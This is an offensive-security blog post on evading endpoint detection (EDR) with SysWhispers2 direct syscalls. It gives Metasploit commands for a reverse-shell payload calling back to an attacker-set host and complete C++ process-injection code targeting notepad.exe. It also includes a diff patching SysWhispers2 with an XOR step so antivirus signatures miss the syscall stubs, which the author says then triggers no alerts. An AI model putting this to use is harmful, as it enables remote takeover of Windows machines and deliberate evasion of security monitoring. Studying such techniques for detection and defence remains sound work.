Disclaimer

I started working on this post some time ago, and new research was announced in the meantime. I will not address SysWhispers3, the very recent technique of resolving SSNs using the Exception Directory, or many others.

The problematic EDRs

The following post covers SysWhispers2, along with a brief discussion of the problems the tool is meant to address.

Modern workstations are likely to be running multiple security solutions. Such a security-in-depth approach is one of the core concepts implemented in mature environments. Assume that an attacker has already gained remote access to the system and has bypassed any whitelisting, but has not yet elevated privileges. What are the attacker’s next steps? This is a very interesting question. The recent Twitter discussion started by @HackingLZ shows that many red teamers will simply jump elsewhere (typically to servers where security solutions are absent), but others will try to achieve persistence on the local station or elevate privileges to dump credentials. Of course, any offensive action will be analyzed by the EDR, reported to the SIEM, and may trigger unwanted alerts. To simply disable or fully blind the EDR, the attacker would likely need local admin privileges. So, do we elevate privileges to disable EDR or disable EDR to elevate privileges? :)

We’re going to cover a slightly simpler situation where only a single process should evade EDR detection, but the rest still applies. Whatever we decide to run, it’s probably going to create a new process or thread, an operation that is hooked and observed by the majority of EDRs. Any changes to memory page protection bits, writing new data, and calling the code are even more likely to be hooked. The hooks may be created on multiple levels: the very basic API, the more specialized API, or the undocumented API (most likely, as it is where the transition to kernel mode actually happens). Hooks may be easy to spot and remove (e.g. jmp 12345678 at the beginning of a standard API stub), or much harder (e.g. our memory view is completely faked as in this case). Whichever it is, we still need to somehow edit the memory, but the actual API to do that is also hooked. Argh!

This is where syscalls come to the rescue. Instead of using the hooked API, we can prepare the CPU registers and perform the kernel transition manually (using the syscall opcode). Historically, the technique had a major limitation: the syscall numbers (the identifiers that select which kernel service is invoked) are undocumented and may change with every Windows release. The original SysWhispers supported a --versions option to generate syscall stubs for different Windows releases. This technique was based on the syscall table maintained by @j00ru. The obvious limitations of this approach are the lack of support for future releases and having to maintain dedicated lists.

The next project, SysWhispers2, solved this by sorting syscalls by their addresses. The technique is described on the MDSec blog, but in summary:

  • All Zw* stubs are discovered
  • The naming is converted into Nt*
  • Stubs are sorted by their address
  • The order represents incrementing syscall ids

With an array of syscall numbers, an attacker may implement arbitrary syscall routines for the ones that are needed. The EDR’s user-mode hooks will not cover those.
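The four steps above can be illustrated with a toy model that works on plain data instead of a loaded module. This is only a sketch: the `Stub` struct, the `OrderStubs` helper, and any addresses fed into it are made up for illustration, and the resulting indices are positions in the toy list, not real syscall numbers.

```cpp
#include <algorithm>
#include <cstdint>
#include <string>
#include <utility>
#include <vector>

// One discovered stub: its export name and the address it was found at.
// Addresses used with this sketch are invented, not read from a real ntdll.
struct Stub {
    std::string name;
    std::uint64_t address;
};

// Rename Zw* to Nt*, sort by address, and return the names in sorted order.
// The position of a name in the result plays the role of its syscall id.
std::vector<std::string> OrderStubs(std::vector<Stub> stubs) {
    for (auto& s : stubs) {
        if (s.name.rfind("Zw", 0) == 0) {  // name starts with "Zw"
            s.name.replace(0, 2, "Nt");
        }
    }
    std::sort(stubs.begin(), stubs.end(),
              [](const Stub& a, const Stub& b) { return a.address < b.address; });

    std::vector<std::string> ordered;
    ordered.reserve(stubs.size());
    for (auto& s : stubs) {
        ordered.push_back(std::move(s.name));
    }
    return ordered;
}
```

Feeding it three stubs in arbitrary order returns them ordered by address with the Nt prefix, so looking up a name's position gives its id within that toy list.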

Sample project

Before we even grab SysWhispers2, let’s implement a basic project. I’m going to generate a very simple shellcode using Metasploit. The simple reverse shell requires proper encryption / obfuscation prior to use, as it’s easily detected by AVs. To generate it, one can start the Metasploit container with: docker run --rm -it -v "${PWD}:/out" metasploitframework/metasploit-framework, and then type the following commands:

use payload/windows/x64/shell_reverse_tcp
setg LHOST 192.168.1.1
setg EXITFUNC thread
generate -f raw -o /out/shellcode.dat

This should generate a simple reverse shell payload that is also easily detectable by any modern AV. To mitigate this, we need to encrypt it.

[Figure: container with msf console]

To implement the most basic thread injection, we need the following pieces:

  1. finding target (e.g. process of given name)
  2. loading shellcode (e.g. reading from file)
  3. decrypting the shellcode
  4. opening target process with appropriate access rights
  5. allocating new memory inside target process (e.g. via VirtualAllocEx)
  6. writing shellcode into that memory (e.g. via WriteProcessMemory)
  7. creating and starting remote thread (e.g. via CreateRemoteThread)

An EDR would typically hook at least the last four of the above steps, if not all of them. If the payload is properly handled, the AV should not alert.

The above points are implemented using the following code (C++17):

#include <cstdint>
#include <fstream>
#include <iostream>
#include <iterator>
#include <memory>
#include <string>
#include <vector>

#include <Windows.h>
#include <tlhelp32.h>

typedef std::vector<uint8_t> Buffer;

unsigned int FindTarget(const char* process) {
	PROCESSENTRY32 pe32;
	unsigned int pid = 0;

	HANDLE hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (INVALID_HANDLE_VALUE == hProcSnap) return 0;

	pe32.dwSize = sizeof(PROCESSENTRY32);

	if (!Process32First(hProcSnap, &pe32)) {
		CloseHandle(hProcSnap);
		return 0;
	}

	// Process32First already filled pe32 with the first entry, so check it before advancing.
	do {
		if (lstrcmpiA(process, pe32.szExeFile) == 0) {
			pid = pe32.th32ProcessID;
			break;
		}
	} while (Process32Next(hProcSnap, &pe32));

	CloseHandle(hProcSnap);

	return pid;
}

Buffer Load(const std::string& path) {
	std::ifstream f(path, std::ios::in | std::ios::binary);
	Buffer buf((std::istreambuf_iterator<char>(f)), std::istreambuf_iterator<char>());
	return buf;  // returning by name allows copy elision; std::move would inhibit it
}

unsigned char* Decrypt(unsigned char* shellcode) {
	// FIXME: in-place shellcode decryption
	return shellcode;
}

int Inject(const HANDLE hProcess, unsigned char* shellcode, size_t len) {
	LPVOID pRemoteCode = VirtualAllocEx(hProcess, NULL, len, MEM_COMMIT, PAGE_EXECUTE_READ);

	if (!pRemoteCode) {
		return -1;
	}

	auto shellcode_decrypted = Decrypt(shellcode);

	WriteProcessMemory(hProcess, pRemoteCode, (PVOID)shellcode_decrypted, len, (SIZE_T*)NULL);

	// clear from memory, just in case
	ZeroMemory(shellcode_decrypted, len);	

	HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL);
	if (hThread != NULL) {
		WaitForSingleObject(hThread, 500);
		CloseHandle(hThread);

		return 0;
	}

	return -1;
}

int main(int argc, char** argv) {
	auto pid = FindTarget("notepad.exe");
	auto shellcode = Load("shellcode.dat");
	
	// try to open target process	
	HANDLE hProc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
		PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
		FALSE, (DWORD)pid);
	std::shared_ptr<void> safe_h(hProc, &::CloseHandle);

	Inject(hProc, shellcode.data(), shellcode.size());
}

If any running notepad instance is found (and there is no EDR, obviously), you should receive a new reverse shell connection on port 4444.

Because we’re not trying to evade anything, there’s also a thread that stands out when probed with Process Hacker, and a memory region where one can see the decrypted shellcode bytes:

[Figure: new thread] [Figure: container with msf console]

SysWhispers2

The above code works fine. But if you enable an EDR, it will detect, block, and report. Not cool.

So, let’s try to solve this problem with SysWhispers2. Let’s replace the Inject() code with code that uses the unhooked Nt* variants. First, we need to generate the header, C file, and asm file, as described on the GitHub page. Once that is done and the VS project is reconfigured, we end up with the following implementation:

int Inject(const HANDLE hProcess, unsigned char* shellcode, size_t len) {
	LPVOID buffer = nullptr;
	SIZE_T buffer_size = len;
	NtAllocateVirtualMemory(hProcess, &buffer, 0, &buffer_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

	if (!buffer) {
		return -1;
	}

	auto shellcode_decrypted = Decrypt(shellcode);

	NtWriteVirtualMemory(hProcess, buffer, (PVOID)shellcode_decrypted, len, nullptr);

	// clear from memory, just in case
	ZeroMemory(shellcode_decrypted, len);

	ULONG oldProtect;
	NtProtectVirtualMemory(hProcess, &buffer, &buffer_size, PAGE_EXECUTE_READ, &oldProtect);

	HANDLE hThread = NULL;
	NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, hProcess, buffer, nullptr, FALSE, 0, 0, 0, nullptr);

	if (hThread != NULL) {
		WaitForSingleObject(hThread, 500);
		CloseHandle(hThread);

		return 0;
	}

	return -1;
}

The standard function calls were replaced with calls to the wrapped Nt* functions. Their definitions are in the generated asm file. For instance, NtCreateThreadEx is defined as:

NtCreateThreadEx PROC
	mov [rsp +8], rcx          ; Save registers.
	mov [rsp+16], rdx
	mov [rsp+24], r8
	mov [rsp+32], r9
	sub rsp, 28h
	mov ecx, 050D21C16h        ; Load function hash into ECX.
	call SW2_GetSyscallNumber  ; Resolve function hash into syscall number.
	add rsp, 28h
	mov rcx, [rsp +8]          ; Restore registers.
	mov rdx, [rsp+16]
	mov r8, [rsp+24]
	mov r9, [rsp+32]
	mov r10, rcx
	syscall                    ; Invoke system call.
	ret
NtCreateThreadEx ENDP

The magic number representing the hash will be different on your system. It’s a random value generated along with the files. Let’s give it a try.

The message you will likely see is that a VIRUS HAS BEEN DETECTED. Oh no. The problem we’re seeing is that the syscall opcode is being detected and flagged as malicious. It is extremely unlikely to ever be needed in user code, hence the alert. What is normal for trusted Microsoft DLLs is not normal for user code. The same problem has been described in Capt. Meelo’s blog post. The suggested solution was to replace the syscall opcode with int 2Eh [1], which is functionally the same. Spoiler alert: it doesn’t work anymore.

There are different tricks (e.g. egghunting for the syscall opcode) that are elegant and work, but I wanted to show something simpler.

Patching SysWhispers2

While trying to understand whether it’s really the mere presence of the syscall opcode or something more advanced, I discovered that a bit more is verified. syscall is just a two-byte instruction, so it likely wouldn’t be very useful to treat any software that ships with 0x0f 0x05 anywhere in the code as malicious. This is good news: it means all we have to do is make the code flow harder for the EDR/AV to process.
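To see why a bare byte-pair match would be too noisy to serve as a signature, here is a small sketch of a naive scanner. The function name `CountSyscallBytePairs` is hypothetical and this is not how any particular product works; it only shows that 0x0f 0x05 can appear inside unrelated instructions.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Count every offset at which the two-byte sequence 0F 05 appears.
// This deliberately ignores instruction boundaries, which is exactly
// why it over-reports.
std::size_t CountSyscallBytePairs(const std::vector<std::uint8_t>& bytes) {
    std::size_t hits = 0;
    for (std::size_t i = 0; i + 1 < bytes.size(); ++i) {
        if (bytes[i] == 0x0F && bytes[i + 1] == 0x05) {
            ++hits;
        }
    }
    return hits;
}
```

For example, `mov eax, 0x0000050F` encodes as B8 0F 05 00 00. The scanner reports one hit in that buffer even though no syscall instruction is present, so a usable signature has to consider more of the surrounding code flow.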

Initially, I tried to implement something advanced, but soon realized that even the simplest flow modifications are sufficient. Hence, my final patch to SysWhispers2 is:

diff --git a/data/base.c b/data/base.c
index cd5a77d..78e6147 100644
--- a/data/base.c
+++ b/data/base.c
@@ -112,7 +112,7 @@ EXTERN_C DWORD SW2_GetSyscallNumber(DWORD FunctionHash)
     {
         if (FunctionHash == SW2_SyscallList.Entries[i].Hash)
         {
-            return i;
+            return i ^ 11;
         }
     }

diff --git a/syswhispers.py b/syswhispers.py
index 7a1810b..0c4aa32 100644
--- a/syswhispers.py
+++ b/syswhispers.py
@@ -146,6 +146,7 @@ class SysWhispers(object):
         code += '\tsub rsp, 28h\n'
         code += f'\tmov ecx, 0{function_hash:08X}h        ; Load function hash into ECX.\n'
         code += '\tcall SW2_GetSyscallNumber  ; Resolve function hash into syscall number.\n'
+        code += '\txor rax, 11                ; Extra step xor to bypass some signatures.\n'
         code += '\tadd rsp, 28h\n'
         code += '\tmov rcx, [rsp +8]          ; Restore registers.\n'
         code += '\tmov rdx, [rsp+16]\n'

base.c does not return the syscall number anymore. Instead, it returns the value XOR’ed with the arbitrary number 11. Each asm routine has to XOR again to undo the operation and get the original syscall number. That’s it. With this little patch, we can keep whispering the syscalls.
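The round trip relies on XOR being its own inverse. A minimal sketch of just the arithmetic follows; the names `kMask`, `Obscure`, and `Recover` are illustrative and do not appear in SysWhispers2, and 0x18 is an arbitrary example index.

```cpp
#include <cstdint>

constexpr std::uint32_t kMask = 11;  // the arbitrary constant used in the patch

// Mirrors the patched return statement in base.c: index XOR mask.
constexpr std::uint32_t Obscure(std::uint32_t index) { return index ^ kMask; }

// Mirrors the extra xor in each asm stub: applying the same mask again
// restores the original index.
constexpr std::uint32_t Recover(std::uint32_t masked) { return masked ^ kMask; }

// Checked at compile time for one arbitrary example value.
static_assert(Recover(Obscure(0x18)) == 0x18,
              "XOR with the same mask twice yields the original value");
```

Because the identity holds for every 32-bit value, the constant can be anything, as long as both sides use the same one.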

The recompiled application will not trigger any EDR or AV alerts (at least on my setup).

What’s next?

The described patch simply bypasses existing signatures. An obvious improvement would be to use a random XOR operand, add more math operations, etc. The real problem is different: if a syscall originates from user code, then the EDR can detect this afterwards by using Hooking Nirvana techniques and registering additional callbacks via PspSetCreateProcessNotifyRoutine.

If the EDR comes with a kernel driver, the only option to fully bypass it would be to also have code running in a kernel-mode context. This doesn’t mean we can’t win here and there, or use different tricks to disable the driver.

Hope you liked the post!


  1. There is an interesting Twitter discussion on what int 2eh really is and how it’s related to VMX: https://twitter.com/Liran_Alon/status/967540990901923840